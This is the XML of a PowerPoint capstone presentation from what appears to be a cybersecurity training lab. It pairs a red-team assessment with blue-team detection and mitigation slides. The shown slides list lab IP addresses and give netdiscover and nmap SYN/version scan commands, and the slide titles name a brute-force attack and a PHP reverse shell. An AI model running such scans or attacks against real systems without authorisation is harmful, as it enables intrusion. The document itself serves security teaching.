                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>NAT Switch</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.105</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Apache Webserver</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>ELK Stack</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.100</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>SEIM/Network Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>192.168.1.8</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="DBD9E8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attack VM</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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FDB244-832D-46BF-802B-EB650EC2FDC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EF155AE-BFDC-4219-90C0-B113CD38F2F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using nmap to scan for IP addresses of host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9970923A-F5BA-4C3B-99DE-B0084BB8D6AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42D7F28A-86FC-40BC-90E1-B209B319FDA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -r 192.168.1.1/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D848EB-95E4-4D0E-BED6-4681B1AE6E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6662" t="18383" r="41906" b="25663"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="918665" y="1552354"/>
            <a:ext cx="5737315" cy="3136604"/>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4243149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413295-7CF7-4397-B048-66BDA0D2D788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host Discovery: Scanning for Services and Versions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9577204F-C03B-4B18-86D4-1D208B830B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used nmap to discover what services were running on IP addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1F486F6-237D-46FB-9584-F12BE7B2A77F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B61A611-AC95-42D0-92EF-027E67FFA676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr numCol="2"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>nmap –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{525FE880-8ACA-464E-BA89-504F20E72758}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21241" t="32277" r="24693" b="19741"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="892417" y="1580367"/>
            <a:ext cx="2244187" cy="1366658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B30D5AE-C1F1-4CC3-BC03-5BD76C6508F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="14696" t="21043" r="31225" b="19521"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="892418" y="3322300"/>
            <a:ext cx="2244187" cy="1366658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
              <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA40DA5-9E21-4F65-AA14-C0397DCE668E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="10449" t="18792" r="36165" b="16445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4786301" y="1580367"/>
            <a:ext cx="2708177" cy="1366658"/>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051161903"/>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2549</TotalTime>
  <Words>2167</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>267</Paragraphs>
  <Slides>26</Slides>
  <Notes>22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26</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="34" baseType="lpstr">
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto Black</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Executive Summary:</vt:lpstr>
      <vt:lpstr>Network Topology </vt:lpstr>
      <vt:lpstr>Network Topology</vt:lpstr>
      <vt:lpstr>Red Team Security Assessment </vt:lpstr>
      <vt:lpstr>Recon: Describing the Target</vt:lpstr>
      <vt:lpstr>Host Discovery</vt:lpstr>
      <vt:lpstr>Host Discovery: Scanning for Services and Versions</vt:lpstr>
      <vt:lpstr>Vulnerability Assessment</vt:lpstr>
      <vt:lpstr>Exploitation: Exposure of Information Through Directory Listing</vt:lpstr>
      <vt:lpstr>Exploitation: Brute Force Attack</vt:lpstr>
      <vt:lpstr>Exploitation: [PHP Reverse Shell]</vt:lpstr>
      <vt:lpstr>Blue Team Log Analysis and  Attack Characterization</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the Port Scan</vt:lpstr>
      <vt:lpstr>Analysis: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Analysis: Uncovering the Brute Force Attack</vt:lpstr>
      <vt:lpstr>Analysis: Finding the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Analysis: Identifying the PHP Reverse Shell</vt:lpstr>
      <vt:lpstr>Blue Team Proposed Alarms and  Mitigation Strategies</vt:lpstr>
      <vt:lpstr>Mitigation: Blocking the Port Scan</vt:lpstr>
      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads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Capstone Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <dc:creator>Henry</dc:creator>
  <cp:lastModifiedBy>Henry</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-27T18:35:02Z</dcterms:modified>
</cp:coreProperties>
</file>